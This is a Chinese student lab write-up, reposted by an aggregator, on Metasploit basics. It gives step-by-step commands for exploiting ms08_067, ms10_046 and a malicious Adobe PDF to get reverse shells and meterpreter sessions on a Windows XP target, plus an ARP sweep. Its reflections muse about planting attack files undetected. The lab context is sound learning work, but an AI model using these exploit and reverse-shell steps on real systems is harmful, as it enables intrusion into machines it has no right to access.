20155216 Exp5 MSF基础应用
Exp5 MSF基礎(chǔ)應(yīng)用
基礎(chǔ)問題回答
- 1、用自己的話解釋什么是exploit,payload,encode?
exploit :
Exploit的英文意思就是利用,在做攻擊時,通常稱為漏洞利用。
一個利用程序(An exploit)就是一段通過觸發(fā)一個漏洞(或者幾個漏洞)進(jìn)而控制目標(biāo)系統(tǒng)的代碼。
exploits利用代碼可以在本地也可在遠(yuǎn)程進(jìn)行。一個遠(yuǎn)程攻擊利用允許攻擊者遠(yuǎn)程操縱計算機,理想狀態(tài)下能夠執(zhí)行任意代碼。
payload :
payload屬于名詞,意為有效載荷,在病毒代碼中實現(xiàn)一些有害的或者惡性的動作的部分叫做“有效負(fù)載”(payload)。
payload可以實現(xiàn)任何運行在受害者環(huán)境中的程序所能做的事情,并且能夠執(zhí)行動作包括破壞文件刪除文件,向病毒的作者或者任意的接收者發(fā)送敏感信息,以及提供通向被感染計算機的后門。
encode :
encode本意為編碼,可在不改變payload功能的情況下對其進(jìn)行編碼,一些好的編碼方式可以使攻擊或相關(guān)的文件不被發(fā)現(xiàn)。
實踐內(nèi)容
一、主動攻擊:ms08_067漏洞攻擊
攻擊機: kali linux x64
靶機: windows XP SP3(English)
實驗前準(zhǔn)備:將windows XP的防火墻關(guān)閉;進(jìn)入msfconsole界面。
1、先用 search ms08_067 指令查詢針對該漏洞可以運用的攻擊模塊:
根據(jù)提示,使用 use exploit/windows/smb/ms08_067_netapi 使用該模塊,并使用 show payloads 查看可以供我們使用的payload:
可查看到有很多可以使用的正常的payload。
2、選擇通過反向連接來獲取shell的 generic/shell_reverse_tcp 作為payload,使用指令 set payload generic/shell_reverse_tcp 對payload進(jìn)行設(shè)置,并使用 show options 查看:
3、發(fā)現(xiàn)源端口和目的端口是默認(rèn)固定的,需要設(shè)置一個RHOST(靶機的IP地址)和一個LHOST(攻擊機的IP地址):
使用 show options 查看設(shè)置結(jié)果:
4、接著使用 exploit 指令開始攻擊:
5、攻擊成功后獲取了靶機的shell,此時可使用 systeminfo 指令查看靶機系統(tǒng)信息:
二、對瀏覽器攻擊:ms10_046漏洞攻擊
1、利用search ms10_046指令查看可以運用的攻擊模塊:
2、根據(jù)提示,使用 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 使用該模塊,并使用show payloads查看:
3、使用 set payload windows/meterpreter/reverse_tcp 設(shè)置payload,并使用show options查看參數(shù):
SRVHOST填的是本地監(jiān)聽主機的IP地址,LHOST也是監(jiān)聽的IP地址,所以這里SRVHOST和LHOST都應(yīng)該填攻擊機的IP地址:
4、使用xp系統(tǒng)打開鏈接: http://192.168.52.131:80/ :
此時kali顯示接入一個會話:
5、使用 sessions -i 1 選擇會話1,成功獲取了靶機的shell,利用 systeminfo 指令查看靶機的系統(tǒng)信息:
三、對Adobe的漏洞攻擊
1、先使用search adobe查詢和adobe漏洞有關(guān)的模塊:
2、個人選擇: exploit/windows/fileformat/adobe_cooltype_sing ,然后show payloads查看payload:
3、選擇 windows/meterpreter/reverse_tcp ,并使用show options查看參數(shù):
只需建立本地主機IP:LHOST,輸入 exploit 將在固定的位置生成相應(yīng)的文件:
5、在文件查看處選擇顯示隱藏文件,在相應(yīng)的位置找到msf.pdf:
6、將文件拷貝至windows XP下,并在kali下輸入:
use exploit/multi/handler set LHOST 192.168.52.131 set LPORT 4444 exploit7、將win XP下的PDF打開,攻擊機成功獲取到靶機shell:
四、輔助模塊的應(yīng)用
1、使用 show auxiliary 查看可以運用的輔助模塊:
選擇ARP掃描,使用命令: use scanner/discovery/arp_sweep ,并使用show options查看參數(shù):
只需設(shè)置目的主機IP即可:
也可設(shè)置一個網(wǎng)段進(jìn)行掃描:
實驗總結(jié)與體會
通過本次實驗,再一次領(lǐng)略了MSF平臺功能的豐富和強大。不但可以攻擊很多方面的漏洞,還有很多各種各樣的輔助功能,光是掃描就有特別多種,幾乎覆蓋了所有的掃描方式。但也在實驗過程中發(fā)現(xiàn)了MSF的局限性與落后性。在針對系統(tǒng)的攻擊方面,只能攻擊windows XP系統(tǒng),對win7系統(tǒng)的攻擊嘗試無效。并且針對瀏覽器的攻擊也只能攻擊IE8及以下的版本,甚至有些連IE8也攻擊不了,所以在實際應(yīng)用中存在非常大的局限性。
當(dāng)然,通過對MSF攻擊的學(xué)習(xí),我們對一些理論課上學(xué)到的一些攻擊付諸實踐,對于滲透測試有了更深的理解。若要將攻擊運用到實踐中,還需不斷地研究各類新型的漏洞,并獲取更高的權(quán)限對其他主機進(jìn)行掃描和注入。
離實戰(zhàn)還缺些什么技術(shù)或步驟?
1、在實踐中發(fā)現(xiàn)MSF攻擊的局限性很大,其中的漏洞幾乎都是針對win XP系統(tǒng),而實際應(yīng)用的系統(tǒng)大部分是win7及以上的系統(tǒng),如果需要實戰(zhàn)攻擊win7及以上的系統(tǒng),還需要不斷發(fā)現(xiàn)并成功利用新的漏洞。
2、需要提高掃描等信息收集技術(shù),信息收集是做攻擊的重要前提,但大多數(shù)初級的掃描都會被win7及以上的系統(tǒng)發(fā)現(xiàn)甚至拒絕,所以提供相應(yīng)的技術(shù)很重要。
3、在對Adobe的漏洞攻擊中,需要把PDF文件植入被攻擊主機,如果在不被發(fā)現(xiàn)植入危險的文件的情況下成功將攻擊所需文件植入靶機,也是一個值得深思的問題。
轉(zhuǎn)載于:https://www.cnblogs.com/LeeX1997/p/8920919.html
總結(jié)
以上是生活随笔為你收集整理的20155216 Exp5 MSF基础应用的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 基于Spring读写分离
- 下一篇: 原生js实现一个连连看小游戏(一)